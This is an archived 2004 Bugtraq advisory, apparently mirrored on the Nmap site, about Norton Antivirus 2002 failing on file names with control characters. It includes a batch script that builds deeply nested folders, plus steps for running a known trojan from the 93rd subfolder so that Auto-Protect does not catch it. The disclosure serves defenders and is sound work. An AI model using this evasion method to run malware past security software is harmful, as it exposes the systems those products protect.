Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: Re: Norton Antivirus 2002 fails to scan files with ... [2'nd... UPDATED]

Re: Norton Antivirus 2002 fails to scan files with ... [2'nd... UPDATED]

From: Bipin Gautam. <door_hunt3r_at_blackcodemail.com>
Date: 6 Mar 2004 04:08:33 -0000
('binary' encoding is not supported, stored as-is) In-Reply-To: <20040305183533.17369.qmail_at_www.securityfocus.com>

Subject: Norton Antivirus 2002 fails to scan files with special character(s) properly.
Published: Friday, 05 March, 2004
Updated: 06-Mar-04
Discovered By: Bipin Gautam ( hUNT3R )
Product Version: Norton Antivirus 2002 [ ver: 8.00.58 ] (~Only tested On...~)
Risk Impact: Low-Medium

* * *
Details:

During a 'manual scan' of a folder, if Norton Antivirus (NAV) encounters a file /folder name with 'some' ASCII characters ( 1-31) NAV can't further proceed the manual scan and its front-end 'NAVW32.exe' crashes! This Bug has no impact in the NAV Auto-Protect Engine.

Exploit 1). : http://www.geocities.com/visitbipin/test_nav.zip
Create a folder (say: '!' ) and put some sub-folders and files in it. The file/sub-folder name must contain ASCII character(s) ( 1-31) . Have a manual scan of the folder named '!' NAV can't proceed the scan and crashes!

Exploit 2). : Run this batch script, first and make sure you have 95 sub-folders inside the folder named '----------------------------------------------------------------' in c:\ (root)



=-------CUT----------=
@echo off
echo ( you can use, http://www.eicar.org/anti_virus_test_file.htm)
echo for a harmless test...
pause
cd\
c:
cd\
:hUNT3r
md 1
cd 1
if not errorlevel 1 goto :hUNT3r
:rename
cd\
c:
cd\
ren 1 ----------------------------------------------------------------
explorer c:
exit

=-------CUT----------=

Now... drag/drop a trojan named 1.exe (that NAV recognises as a hostile program) to the 93'rd sub-folder and execute the program from there........ NAV-AUTO PROTECT is unable to scan/block the program & the trojan gets executed.

[...THIS TECHNIQUE SHOULD WORK FOR SOME OTHER ANTIVIRUS PRODUCT TOO...]

Make sure the trojan/warm.exe just have a 1 character file-name! when it is executer from 93'rd sub directory! (...Last possible DIRECTORY where the file file can be copied!)
 

Disclaimer: The information in the advisory is believed to be accurate at the time of printing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage arising from use of, or reliance on this information.


Received on Mar 06 2004

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]